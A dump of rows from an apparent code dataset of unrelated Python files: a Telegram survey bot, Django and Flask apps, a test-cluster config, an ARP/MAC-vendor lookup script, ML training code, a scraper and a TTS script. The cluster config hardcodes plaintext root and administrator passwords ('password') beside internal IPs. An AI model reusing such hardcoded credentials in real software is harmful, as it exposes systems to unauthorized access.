phone = StringField(required=True)
email = StringField(required=True)
address = StringField(required=True)
wishes = StringField(required=True)
@bot.message_handler(commands=['start'])
def start(message):
kb = InlineKeyboardMarkup()
button1 = InlineKeyboardButton('Да', callback_data='yes')
button2 = InlineKeyboardButton('Нет', callback_data='no')
kb.add(button1, button2)
bot.send_message(message.chat.id, 'Здравствуйте. Пройдете опрос?', reply_markup=kb)
@bot.callback_query_handler(func=lambda call: call.data == 'no')
def bye(call):
bot.send_message(call.from_user.id, 'До свидания')
@bot.callback_query_handler(func=lambda call: call.data == 'yes')
def start(call):
bot.send_message(call.from_user.id, 'Хорошо')
bot.send_message(call.from_user.id, 'Как Вас зовут?')
@bot.message_handler(content_types=['text'])
def response(message):
data['name'] = message.text
bot.send_message(message.chat.id, 'Какая у Вас фамилия?')
bot.register_next_step_handler(message, get_surname)
def get_surname(message):
data['surname'] = message.text
bot.send_message(message.chat.id, 'Как Ваше отчество?')
bot.register_next_step_handler(message, get_middle_name)
def get_middle_name(message):
data['middle_name'] = message.text
kb = ReplyKeyboardMarkup(resize_keyboard=True)
button = KeyboardButton(text='поделиться контактом', request_contact=True)
kb.add(button)
bot.send_message(message.chat.id, 'Поделитесь номером телефона?', reply_markup=kb)
bot.register_next_step_handler(message, get_phone)
@bot.message_handler(content_types=['contact'])
def get_phone(message):
data['phone'] = message.contact.phone_number
bot.send_message(message.chat.id, 'Какой у Вас e-mail?')
bot.register_next_step_handler(message, get_email)
def get_email(message):
data['email'] = message.text
bot.send_message(message.chat.id, 'Какой Ваш адрес?')
bot.register_next_step_handler(message, get_address)
def get_address(message):
data['address'] = message.text
bot.send_message(message.chat.id, 'Какие у Вас пожелания?')
bot.register_next_step_handler(message, get_wishes)
def get_wishes(message):
data['wishes'] = message.text
User.objects.create(**data)
bot.send_message(message.chat.id, 'Спасибо.')
bot.polling()
|
6,389 | 573674e50e05880a2822f306c125207b382d872f | from django.conf import settings
from django.contrib import admin
from django.urls import path, include, reverse_lazy
from django.views.generic import RedirectView, TemplateView
from mainapp.views import ShortURLRedirect
urlpatterns = [
path('', TemplateView.as_view(template_name='mainapp/index.html'), name='index'),
path('code/<int:pk>', TemplateView.as_view(template_name='mainapp/index.html'), name='code'),
path('auth/', include('authapp.urls', namespace='authapp')),
path('api/', include('api.urls', namespace='api')),
path('s/<slug:link>', ShortURLRedirect.as_view(), name='short_link'),
path('admin/', admin.site.urls),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns += path('__debug__/', include(debug_toolbar.urls)),
|
6,390 | e70ebd9bb9cd7027772ec117cb91349afba7ab10 | #TODO: allow workers to pull this from cache
RABBITMQ_IP = '172.23.105.82'
OBJECT_CACHE_IP = "172.23.105.69"
OBJECT_CACHE_PORT = "11911"
SERIESLY_IP = ''
COUCHBASE_IP = '172.23.105.54'
COUCHBASE_PORT = '8091'
COUCHBASE_USER = "Administrator"
COUCHBASE_PWD = "password"
SSH_USER = "root"
SSH_PASSWORD = "password"
WORKERS = ['127.0.0.1']
WORKER_CONFIGS = ["all"]
CB_CLUSTER_TAG = "default"
CLUSTER_IPS = ["172.23.105.54", "172.23.105.57", "172.23.105.62", "172.23.105.55"]
# xdcr config
"""
" pointer information to remote sites
" remote1 = name for remote site
" RABBITMQ_IP = broker managing remote site (can be same as local broker if using different vhosts)
" this should equal RABBITMQ_IP of remote site
" CB_CLUSTER_TAG = represents vhost watched by workers remote site.
" this should equal CB_CLUSTER_TAG of remote site
" COUCHBASE_IP/PORT = IP/PORT of a couchbase node in remote site
"""
REMOTE_SITES = {"remote1" : {"RABBITMQ_IP" : "172.23.105.99",
"CB_CLUSTER_TAG" : "default",
"COUCHBASE_IP" : "172.23.105.58",
"COUCHBASE_PORT" : "8091"}}
LOGDIR="logs" # relative to current dir
#Backup Config
ENABLE_BACKUPS = False
BACKUP_DIR = "/tmp/backup"
BACKUP_NODE_IP = "127.0.0.1"
BACKUP_NODE_SSH_USER = "root"
BACKUP_NODE_SSH_PWD = "password"
|
6,391 | 2424d667e1bb4ee75b5053eb6f9b002787a5317f | from flask import Flask, request, jsonify
import sqlite3
from database import Database
app = Flask(__name__)
db = Database()
@app.route('/')
def homepage():
    """Return the facilities of the requested facility type as JSON.

    Query parameter ``facil`` selects the facility type; on any lookup
    failure an empty list is returned instead of a 500.
    """
    faciltype = request.args.get('facil')
    try:
        # Bug fix: materialize to a list — on Python 3 ``map`` returns a
        # lazy iterator that jsonify cannot serialize (TypeError -> 500).
        # https://stackoverflow.com/questions/5022066/how-to-serialize-sqlalchemy-result-to-json
        facils = [facil.toDictNoType()
                  for facil in db.getFacilitiesFromFacilityType(faciltype)]
    except Exception:
        # Deliberate best-effort: any DB error yields an empty result.
        facils = []
    return jsonify(facilities=facils)
@app.route('/auto')
def autocomplete():
    """Return building-name autocomplete suggestions for ``term``."""
    terms = []
    try:
        term = request.args.get('term')
        if len(term) > 0:
            # Bug fix: build a list — jsonify cannot serialize the lazy
            # ``map`` object that Python 3 returns.
            terms = [bldg.toDictNoLatLon() for bldg in db.getBuildingsLike(term)]
    except Exception:
        # Best-effort: missing term / DB errors yield an empty list.
        terms = []
    return jsonify(terms=terms)
@app.route('/building-location')
def getBuilding():
    """Look up one building by name and return it (with location) as JSON."""
    result = {}
    try:
        name = request.args.get('name')
        result = db.getBuilding(name).toDict()
    except:
        result = {}
    return jsonify(building=result)
@app.route('/building')
def getFacilitiesFromBuilding():
    """Return all facilities located in the building named by ``name``."""
    facils = []
    try:
        bldg = request.args.get('name')
        # Bug fix: build a list — on Python 3 ``map`` returns a lazy
        # iterator that jsonify cannot serialize.
        facils = [facil.toDict() for facil in db.getFacilitiesFromBuilding(bldg)]
    except Exception:
        facils = []
    return jsonify(facilities=facils)
@app.route('/faciltypes')
def getFacilityTypes():
    """Return the names of all known facility types."""
    faciltypes = []
    try:
        # Bug fix: list(...) because jsonify cannot serialize the lazy
        # ``map`` object that Python 3 returns.
        faciltypes = [faciltype.name for faciltype in db.getAllFacilityTypes()]
    except Exception:
        faciltypes = []
    return jsonify(facility_types=faciltypes)
if __name__ == '__main__':
app.run(debug=True, use_reloader=True)
|
6,392 | 7c5877eea78c3fa8b7928219edd52e2502c16c09 | from django import forms
class TeacherForm(forms.Form):
    """Contact form for a teacher: display name plus email address.

    Both widgets carry Bootstrap utility classes so the template can
    render the fields without extra markup.
    """
    name = forms.CharField(label='Your Name', max_length=100, widget=forms.TextInput(
        attrs={'class': 'form-control text-center w-75 mx-auto'}))
    email = forms.EmailField(widget=forms.TextInput(
        attrs={'class': 'form-control text-center w-75 mx-auto'}))
6,393 | 2471daad5969da29a20417a099a3ecd92fa036b4 | import sys
import array
import random
import math
import gameduino2.prep
import zlib
import struct
import gameduino as GD
from eve import align4
from PIL import Image
import numpy as np
import wave
import common
GLOWR = (128, 256)
GLOWR = (160, 400)
sys.path.append("/home/jamesb/git/gd2-asset/examples/nightstrike")
import night0
class Renderer(common.Branded):
def __init__(self, eve):
self.eve = eve
self.t = 0
def load(self):
eve = self.eve
eve.cc(open("/home/jamesb/git/gd2-asset/examples/nightstrike/night0.gd3", "rb").read())
def draw(self):
eve = self.eve
eve.VertexFormat(3)
eve.ClearColorRGB(0, 0, 100)
eve.Clear()
eve.Begin(GD.BITMAPS)
eve.BlendFunc(GD.SRC_ALPHA, 0)
night0.missile_a.draw(eve, 640, 360, 2, angle = self.t)
self.t += 1
|
6,394 | d566104b00ffd5f08c564ed554e0d71279a93047 | #!/usr/bin/python
import pprint
import requests
import string
import subprocess
#Create the three working files ('w+' creates/truncates them).
f_arptable = open( 'arptable', 'w+' )
f_maclist = open( 'maclist', 'w+' )
f_maclookup = open( 'maclookup', 'w+' )
#Ensure the three files are writable.
subprocess.call([ 'chmod','+w','maclist' ])
subprocess.call([ 'chmod','+w','arptable' ])
subprocess.call([ 'chmod','+w','maclookup' ])
#Bug fix: run `arp -a` and WAIT for it to finish so 'arptable' is fully
#written before it is read back below (Popen returned immediately and
#raced the read).
subprocess.call(['arp','-a'],stdout=f_arptable)
f_arptable.flush()
#Vendor lookup endpoint; the MAC address is appended after the slash.
#(Bug fix: the old format 'http://macvendors.co/api%s' was queried once
#with the literal string 'macs', and its result was never assigned.)
maclookup_url = 'http://macvendors.co/api/%s'
#Pull the IP and MAC from each arp entry, look up the vendor for that
#MAC, and append all three to the maclist file.
for line in open('arptable'):
    if line.startswith('?'):
        ips = line.split()[1]
        macs = line.split()[3]
        #Bug fix: 'devmon' previously raised NameError here. Query the
        #API per MAC; fall back to 'unknown' on any failure.
        try:
            #NOTE(review): response schema assumed to be
            #{'result': {'company': ...}} - confirm against the API docs.
            devmon = requests.get(maclookup_url % macs).json().get('result', {}).get('company', 'unknown')
        except Exception:
            devmon = 'unknown'
        f_maclist.write('\nIP Address: ' + ips + '\nMAC: ' + macs +
            '\nDevice Manufacturer: ' + devmon + '\n' )
#Flush before cat so the listing actually shows the new contents.
f_maclist.flush()
subprocess.call(['cat','maclist'])
6,395 | f0f8ad7b65707bcf691847ccb387e4d026b405b5 | from django.shortcuts import render
from .models import Recipe, Author
def index(request):
recipes_list = Recipe.objects.all()
return render(request, "index.html",
{"data": recipes_list, "title": "Recipe Box"})
def recipeDetail(request, recipe_id):
recipe_detail = Recipe.objects.filter(id=recipe_id).first()
return render(request, "recipe_detail.html",
{"recipe": recipe_detail})
def authorDetail(request, author_id):
author = Author.objects.filter(id=author_id).first()
recipes = Recipe.objects.filter(author=author_id)
return render(request, "author_detail.html",
{"recipes": recipes, "author": author})
|
6,396 | 05ca7bbc3285a9e37921c0e514a2e31b05abe051 | from data_loaders.data_module import ChestDataModule
from utils.visualisation import showInRow
from models import get_model
from transforms.finetuning import ChestTrainTransforms, ChestValTransforms
from models.baseline import BaseLineClassifier
from pytorch_lightning.loggers import WandbLogger
from pytorch_lightning.callbacks import ModelCheckpoint
import torch
import pytorch_lightning as pl
from pytorch_lightning import seed_everything
seed_everything(12345)
dm = ChestDataModule(["chexpert_14"], batch_size=32, num_workers=2, balanced=False)
dm.train_transforms = ChestTrainTransforms(height=224)
dm.val_transforms = ChestValTransforms(height=224)
classifier = BaseLineClassifier(get_model("resnet18", pretrained=True),
num_classes=14,
linear=False,
learning_rate=1e-5,
b1=0.9,
b2=0.999,
weight_decay=1e-4,
multi_class=True,
mixup=False,
ct_reg=False)
wandb_logger = WandbLogger(name='baseline-NL-chexpert_14-full-Adam-1e_5',project='thesis')
checkpoint_callback = ModelCheckpoint(monitor='val_loss',
dirpath='logs/baseline/chexpert_14/',
filename='NL-full-Adam-1e_5-{epoch:02d}-{val_loss:.4f}')
trainer = pl.Trainer(gpus=1, deterministic=True,
logger=wandb_logger, callbacks=[checkpoint_callback], max_epochs=20, num_sanity_val_steps=10)
if torch.cuda.is_available():
classifier = classifier.cuda()
trainer.fit(classifier, dm) |
6,397 | e477a59e86cfeb3f26db1442a05d0052a45c42ff | #!/oasis/scratch/csd181/mdburns/python/bin/python
import sys
import pickle
import base64
from process import process
import multiprocessing as mp
EPOCH_LENGTH=.875
EPOCH_OFFSET=.125
NUM_FOLDS=5
if __name__ == "__main__":
mp.freeze_support()
p= mp.Pool(2)
for instr in sys.stdin:
this_key=''
sys.stderr.write('mapper: begin receiving data\n')
instr = instr.strip()
keystr, valstr = instr.split('\t', 1)
sys.stderr.write('mapper: key_string ' + keystr + '\n')
this_key, this_id = keystr.split('.', 1)
sys.stderr.write('mapper: key is ' + keystr +'\n')
sys.stderr.write('mapper: this_key is ' + this_key +'\n')
sys.stderr.write('mapper: this_id is ' + this_id +'\n')
v = pickle.loads(base64.decodestring(valstr))
y = v[0].reshape((-1,1))
eeg = pickle.loads(v[1])
try:
rov = process(y, eeg, EPOCH_LENGTH, EPOCH_OFFSET, NUM_FOLDS, p)
result = {'id':this_id, 'rov':rov }
except:
sys.stderr.write('mapper: process failed\n')
continue
this_val = base64.b64encode(pickle.dumps(result, protocol=2))
if this_key != '':
print '%s\t%s' % (this_key, this_val)
p.close()
sys.stderr.write('mapper: good job\n') |
6,398 | f45ca4e75de7df542fbc65253bb9cc44a868522a | import requests
from bs4 import BeautifulSoup
import codecs
# Scrape selected facts from the Penn State Wikipedia infobox and dump them
# as "key: value" lines to webScrape.txt.
url = "https://en.wikipedia.org/wiki/Pennsylvania_State_University"
response = requests.get(url)
soup = BeautifulSoup(response.content, 'html.parser')
infoBox = soup.find("table", class_="infobox vcard")
# Seed the result with the page title.
# (Fixed: output key was misspelled "Univeristy".)
webScrape = {"University": "The Pennsylvania State University"}
# Infobox row headers we want to capture, verbatim.
wantedInfo = ["Motto", "Type", "Established", "Academic affiliations",
              "Endowment", "Budget", "President", "Provost",
              "Academic staff", "Students", "Undergraduates",
              "Postgraduates", "Location", "Campus", "Newspaper",
              "Colors", "Nickname", "Sporting affiliations", "Mascot", "Website"]
#Get all of the data inside info box
for tr in infoBox.find_all("tr"):
    #Grab table header and table data; skip rows lacking either cell
    headers = tr.findChildren("th", recursive=False)
    cells = tr.findChildren("td", recursive=False)
    if not headers or not cells:
        continue
    header = headers[0]
    data = cells[0]
    label = header.get_text()  # hoisted: was re-evaluated several times per row
    #Add to dictionary if not in it already (first occurrence wins)
    if label not in webScrape and label in wantedInfo:
        #Decompose unwanted tags: citation <sup> markers and decorative
        #<span>s -- except the Website row, whose link text lives in a <span>.
        while data("sup"):
            data.find("sup").decompose()
        while data("span") and label != "Website":
            data.find("span").decompose()
        webScrape[label] = data.get_text()
#Writing to file, one "key: value" line per scraped field
with codecs.open("webScrape.txt", "w", encoding="utf-8") as output_data:
    for key, value in webScrape.items():
        output_data.write("{}: {}\n".format(key, value))
6,399 | 32f4f7ad61b99848c907e092c5ed7a839f0b352b | import pyttsx3
from pydub import AudioSegment
# Synthesize each subtitle cue from an .srt file to its own audio clip with
# pyttsx3, plus a silence clip covering the gap to the next cue.
engine = pyttsx3.init() # object creation
""" RATE"""
#printing current voice rate
engine.setProperty('rate', 150) # setting up new voice rate
rate = engine.getProperty('rate') # getting details of current speaking rate
print (rate)
"""VOLUME"""
# volume = engine.getProperty('volume') #getting to know current volume level (min=0 and max=1)
# print (volume) #printing current volume level
# engine.setProperty('volume',1.0) # setting up volume level between 0 and 1
# """VOICE"""
# voices = engine.getProperty('voices') #getting details of current voice
# #engine.setProperty('voice', voices[0].id) #changing index, changes voices. o for male
# engine.setProperty('voice', voices[1].id) #changing index, changes voices. 1 for female
# engine.say("Hello World!")
# engine.say('My current speaking rate is ' + str(rate))
# engine.runAndWait()
# engine.stop()
"""Saving Voice to a file"""
# On linux make sure that 'espeak' and 'ffmpeg' are installed
# .srt layout assumed: exactly 4 lines per cue (index, timing, text, blank),
# so a[2] is the first cue's text and a[1] its "start --> end" timing line.
# TODO(review): multi-line cue text would break the fixed i += 4 stride.
a=open('TrumpNewFF.srt').readlines()
i=2
l = len(a)
while i<l:
    # Synthesize this cue's text; runAndWait() blocks until the file is written.
    engine.save_to_file(a[i], 'TTS/trump/{}.mp3'.format(str(i)))
    engine.runAndWait()
    # Only emit a silence gap when a following cue exists.
    if i+3<l:
        # a[i-1] is this cue's timing line; take its END timestamp (hh:mm:ss,mmm).
        time_1 = a[i-1].split(' --> ')[1].split(':')
        time_1_mil = time_1[-1].split(',')
        # seconds*1000 + milliseconds.  NOTE(review): `% 1000` is a no-op for
        # well-formed 3-digit millisecond fields.
        time_1_mil = int(time_1_mil[0])*1000+int(time_1_mil[1])%1000
        # Despite the name, this converts the MINUTES field to milliseconds;
        # the hours field is ignored -- only correct for sub-hour subtitles.
        time_1_hour = float(time_1[-2])*60000
        # a[i+3] is the NEXT cue's timing line; take its START timestamp.
        time_2 = a[i+3].split(' --> ')[0].split(':')
        time_2_hour = float(time_2[-2])*60000
        time_2_mil = time_2[-1].split(',')
        time_2_mil = int(time_2_mil[0])*1000+int(time_2_mil[1])%1000
        # Gap between the end of this cue and the start of the next, in ms.
        duration = float(time_2_hour+time_2_mil)-float(time_1_hour+time_1_mil)
        # create 1 sec of silence audio segment
        one_sec_segment = AudioSegment.silent(duration=int(duration)) #duration in milliseconds
        print(i, duration, time_2_hour+time_2_mil, time_1_hour+time_1_mil)
        #Either save modified audio
        # NOTE(review): file is named .mp3 but exported with format="wav";
        # the container will not match the extension -- confirm intent.
        one_sec_segment.export('TTS/trump/{}.mp3'.format(str(i+1)), format="wav")
    i+=4
engine.stop() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.